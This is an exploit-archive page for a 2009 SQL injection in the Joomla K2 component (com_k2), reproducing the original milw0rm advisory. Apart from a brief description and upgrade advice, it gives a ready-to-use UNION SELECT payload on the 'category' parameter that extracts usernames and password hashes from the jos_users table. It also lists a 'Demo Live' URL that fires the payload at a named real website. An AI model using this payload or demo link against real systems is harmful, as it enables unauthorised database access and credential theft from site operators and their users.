header-logo
Suggest Exploit
vendor:
K2 Module
by:
Chip D3 Bi0s
7,5
CVSS
HIGH
SQL injection
89
CWE
Product Name: K2 Module
Affected Version From: 1.0.1 Beta
Affected Version To: 1.0.1 Beta
Patch Exists: Yes
Related CWE: N/A
CPE: a:joomlaworks:k2_module
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_k2 (sectionid) SQL injection Vulnerability

A vulnerability exists in the Joomla Component com_k2 (sectionid) which allows an attacker to inject arbitrary SQL commands. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter. This can allow the attacker to view, add, modify or delete records in the back-end database.

Mitigation:

Upgrade to the latest version of Joomla Component com_k2 (sectionid) or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

----------------------------------------------------------------------
Joomla Component com_k2 (sectionid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################

  
 Information from file: mod_k2.xml

 Name         : K2 Module
 Author       : JoomlaWorks
 CreationDate : April 6th, 2009
 Copyright    : Copyright (c) 2006-2009 JoomlaWorks Ltd. All rights reserved.
 AuthorEmail  : contact@joomlaworks.gr
 AuthorUrl    : www.joomlaworks.gr
 Version      : 1.0.1 Beta 
 License      : http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
 
 Dowloand     : http://code.google.com/p/joomlaworks/downloads/detail?name=K2-1.0.1beta2_j15_UNZIP_FIRST.zip
 
--------------------------------------------------------------------


Example:

http://localHost/path//index.php?option=com_k2&view=itemlist&category=<sql Code>

<Sql Code>:
null'+and+1=2+union+select+1,concat(username,0x3a,password)ChipD3Bi0s,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
 

Demo Live (1):
http://ajedrezmarketing.com/index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password)ChipD3Bi0s,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*



+++++++++++++++++++++++++++++++++
[!] Produced in South America
---------------------------------

# milw0rm.com [2009-06-29]